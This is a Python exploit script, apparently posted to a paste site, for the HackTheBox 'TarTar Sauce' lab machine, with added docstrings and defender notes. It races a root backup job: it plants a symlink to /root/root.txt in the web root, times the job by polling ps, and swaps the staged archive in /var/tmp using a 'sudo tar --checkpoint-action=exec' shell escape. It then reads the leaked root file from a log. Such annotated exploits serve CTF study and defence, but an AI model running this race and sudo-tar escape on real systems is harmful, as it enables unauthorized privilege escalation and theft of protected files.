
Untitled

a guest
Oct 21st, 2018
  1. #!/usr/bin/env python
  2. #HtB.eu TarTar Sauce to root.txt python exploit
  3.  
  4. from os import system
  5.  
  6. import datetime
  7.  
  8. import os
  9.  
  10. import subprocess
  11.  
  12. import time
  13.  
  # Counter carried over from the original listing; nothing visible reads it.
  count = 0

  # Names searched for (as plain substrings) in `ps -e` output by
  # check_process(). NOTE(review): presumably "backuperer" is a scheduled
  # privileged job on the target and tar/sleep/diff are its phases -- the job
  # itself is not part of this listing, confirm against the host.
  process_name = "backuperer"
  tarunnin = "tar"
  sleepyet = "sleep"
  wtdiff = "diff"

  # File name of the archive this script builds, relative to the directory
  # the script is started from.
  maltar = "maltar.tar"
  35.  
  36. #def cleanup():
  37.  
  38. # tmp = os.popen("rm maltar.tar shell.sh")
  39.  
  40. # print "clean slate bitches"
  41.  
  42. # return
  43.  
  44.  
  45.  
  def create_simlink():
      """Create a symlink in the web root that points at /root/root.txt.

      Runs ``ln -s`` and then lists /var/www/html filtered for the link name,
      printing that listing together with a timestamp.

      Defender note: the link grants nothing by itself, because the target
      stays unreadable to the calling user. It only matters if a more
      privileged process later archives, extracts or compares this tree and
      reads through links -- presumably what the rest of this script relies
      on (that process is not shown here). Monitoring the web root for new
      symlinks whose targets lie outside it would flag this step.
      """
      os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
      listing = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
      stamp = datetime.datetime.now()
      print("we made " + str(listing) + " at: " + str(stamp))
      print("")
  57.  
  58.  
  59.  
  def create_mal_tar():
      """Archive /var/www/html into the file named by the global ``maltar``.

      tar flags ``zvcPf``: gzip, verbose, create, keep absolute member names
      (``-P``), write to the named file. No ``-h`` is passed, so a symlink in
      the tree is stored as a link entry, not as the target's contents.
      Afterwards the archive is listed and the result printed with a
      timestamp.

      Defender note: anything that unpacks or compares archives it did not
      build itself should reject link members and absolute member names
      before touching the extracted tree.
      """
      os.popen("tar zvcPf " + maltar + " /var/www/html/").read()
      listing = os.popen("ls -a " + str(maltar)).read()
      stamp = datetime.datetime.now()
      print("file: " + str(listing) + " created at: " + str(stamp))
      print("")
  71.  
  72.  
  73.  
  def rm_simlink():
      """Delete the symlink from the web root and print what is left.

      After this call the link exists only inside the archive built earlier;
      the live web root no longer contains it. The follow-up listing is
      printed as a check (the ``grep`` pattern is left unquoted, as in the
      original, so the shell may expand it first).
      """
      os.popen("rm /var/www/html/boobies.txt").read()
      remaining = os.popen("ls /var/www/html/ |grep boob*").read()
      print("is there boobie.txt? " + str(remaining))
      print("")
  85.  
  86.  
  87.  
  def check_process(prcssname):
      """Block until ``prcssname`` appears somewhere in ``ps -e`` output.

      The loop re-runs ``ps -e`` back to back with no delay, and the test is
      a plain substring match against the whole output, so any line that
      contains the text counts as a hit. When a hit occurs the time is
      printed and the function returns.

      Defender note: this is how an unprivileged account times a privileged
      job -- by watching the process table. Mounting /proc with ``hidepid``
      hides other users' processes, and a burst of ``ps`` executions from one
      account is a usable detection signal.
      """
      print("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
      # Busy-wait: each iteration spawns a fresh `ps -e`.
      while prcssname not in os.popen("ps -e").read():
          pass
      seen_at = datetime.datetime.now()
      print(prcssname + " ran at: " + str(seen_at))
      print("")
  111.  
  112.  
  113.  
  def check_for_tmpfile():
      """Poll /var/tmp until a dot-prefixed entry with a long name shows up.

      The filter is ``[.]\\w{10,}``: a literal dot followed by at least ten
      word characters. The raw ``ls | grep`` output -- trailing newline
      included, and every matching line if there are several -- is stored in
      the module-level ``tmpfile``.

      Defender note: a privileged job that stages work files in a
      world-listable directory such as /var/tmp exposes their names to every
      local user. NOTE(review): whether the file can also be replaced depends
      on its owner and mode, which this listing does not show. Staging in a
      root-owned 0700 directory (``mktemp -d`` under a private path) removes
      both the discovery and the replacement window.
      """
      global tmpfile
      print("lets find that tmpfile name")
      while True:
          tmpfile = os.popen("ls -a /var/tmp |grep -E '[.]\w{10,}'").read()
          if tmpfile != "":
              break  # otherwise keep polling
      found_at = datetime.datetime.now()
      print(tmpfile + " is the tmpfile name")
      print("found at: " + str(found_at))
      print("")
  141.  
  142.  
  143.  
  def tmpfile_check():
      """Debug helper: print the current value of the global ``tmpfile``.

      Nothing in the visible script calls this. It raises NameError if
      check_for_tmpfile() has not set the global yet.
      """
      current = str(tmpfile)
      print("tmpfile variable really global? " + current)
      print("")
  151.  
  152.  
  153.  
  def makin_copies(newtar):
      """Overwrite the staged file in /var/tmp with the prepared archive.

      Steps, in order: print the md5 of the staged file, append a two-line
      ``shell.sh`` (shebang plus a ``cp`` of ``maltar`` onto
      /var/tmp/<tmpfile>), mark it executable, hand it to ``tar`` through
      ``sudo -u onuma`` as a checkpoint action, then print the md5 again.
      ``newtar`` is used only in the progress message.

      Forensics: ``shell.sh`` is written with ``>>`` in the current working
      directory, so it and ``maltar.tar`` remain on disk, and repeated runs
      keep appending to the same script.

      Defender note: NOTE(review) the ``sudo -u onuma tar`` call presupposes
      a sudoers entry that lets the caller run tar as ``onuma`` -- confirm on
      the host. Such an entry is equivalent to a shell as that user, because
      tar can execute commands via its checkpoint actions; do not delegate
      tar (or similar tools with exec hooks) through sudo. A consumer of the
      staged file should verify it with a hash taken and kept out of reach of
      other users, immediately before use, rather than trusting a file that
      sat in a shared directory.
      """
      def _sh(command):
          # Same call shape as everywhere else in the script: run via the
          # shell and read (and here discard or return) its stdout.
          return os.popen(command).read()

      started = datetime.datetime.now()
      before = _sh("md5sum /var/tmp/" + str(tmpfile))
      print("")
      print("hash for legit tar: " + str(before))
      print("")

      shebang = "#!/bin/bash"
      print("makin copies of " + str(newtar) + " at: " + str(started))
      _sh("echo '" + str(shebang) + "' >> shell.sh")
      _sh("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh")
      _sh("chmod +x ./shell.sh")
      _sh("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh")

      after = _sh("md5sum /var/tmp/" + str(tmpfile))
      print("new tar hash: " + str(after))
      print("")
  185.  
  186.  
  187.  
  def sleep_a_sec():
      """Pause for 15 seconds, printing a timestamp before and after.

      The second message still says "5 seconds"; the actual delay is the 15
      passed to ``time.sleep``.
      """
      print("waiting 15 sec start now: " + str(datetime.datetime.now()))
      time.sleep(15)
      print("has it been 5 seconds?" + str(datetime.datetime.now()))
      print("")
  203.  
  204.  
  205.  
  def cat_log():
      """Print the lines containing ``>`` from the tail of the backup error log.

      Reads the last 50 lines of /var/backups/onuma_backup_error.txt and keeps
      those that contain ``>``.

      Defender note: NOTE(review) presumably the privileged job writes the
      output of a file comparison into this log; if so, contents of files only
      root can read end up in a log this user can open. Keep such logs
      root-only (0600) and record that a mismatch occurred, not the differing
      content.
      """
      log_tail = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \>").read()
      print("hash should be near /")
      print("")
      print(str(log_tail))
      # Bare name, not a call: evaluating `exit` does nothing here.
      exit
  219.  
  220.  
  221.  
  222. #cleanup()
  223.  
  # Reset the scratch directory. The `cd` runs inside the child shell spawned
  # by os.popen, so files this script writes by relative name (maltar.tar,
  # shell.sh) land in the directory it was launched from -- that is where to
  # look for artefacts afterwards.
  startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
  print("started right")

  # Stage 1: build the archive while the symlink exists, then remove the link.
  create_simlink()
  create_mal_tar()
  rm_simlink()

  # Stage 2: wait for the job and its phases to show up in the process table.
  check_process(process_name)
  check_process(tarunnin)
  check_process(sleepyet)

  # Stage 3: fixed delay, then learn the name of the staged file in /var/tmp.
  sleep_a_sec()
  check_for_tmpfile()

  # Stage 4: wait for `diff` to appear, swap the staged file, read the log.
  # (Earlier variants that swapped before this wait, or slept 25 s first,
  # were commented out in the original.)
  check_process(wtdiff)
  makin_copies(tmpfile)
  cat_log()